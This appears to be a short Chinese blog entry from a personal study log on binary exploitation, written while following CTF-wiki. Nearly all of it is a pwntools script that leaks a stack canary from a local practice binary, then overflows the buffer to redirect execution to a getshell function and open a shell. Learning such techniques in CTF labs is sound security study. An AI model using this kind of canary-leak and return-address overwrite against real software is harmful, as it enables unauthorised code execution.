跟着ctf-wiki一起学pwn 发表于 2019-02-25 | 更新于 2019-03-20 | 分类于 Binary security 跟着ctf-wiki一起学pwn(学习记录) canary泄露栈中的canary这个比较简单,写一下exp过一下 1234567891011121314151617#!/usr/bin/env pythonfrom pwn import *context(os='linux',arch='i386',log_level='debug')p = process('./ex2')addr = ELF("./ex2").sym["getshell"]p.recvuntil("Hello Hacker!\n");payload = "A"*100p.sendline(payload)p.recvuntil("A"*100)canary = u32(p.recv(4))-0xapayload = "A"*100 + p32(canary) + "A"*12 + p32(addr)p.send(payload)p.recv()p.interactive()